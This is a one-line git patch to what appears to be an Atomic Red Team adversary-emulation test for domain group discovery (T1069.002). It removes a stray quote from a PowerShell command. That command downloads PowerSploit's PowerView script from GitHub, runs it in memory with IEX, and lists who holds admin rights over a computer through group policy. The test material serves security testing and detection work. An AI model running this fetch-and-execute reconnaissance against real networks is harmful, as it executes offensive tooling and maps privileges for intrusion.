From a639c6daab6747d0ec90f5160d17cc1491d15504 Mon Sep 17 00:00:00 2001 From: kdebscwx <129999414+kdebscwx@users.noreply.github.com> Date: Wed, 22 Nov 2023 15:54:05 -0500 Subject: [PATCH] T1069.002 Test #6 fix typo in command --- atomics/T1069.002/T1069.002.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 1f10eab601..aaeb28309f 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -218,7 +218,7 @@ takes a computer and determines who has admin rights over it through GPO enumera ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose ```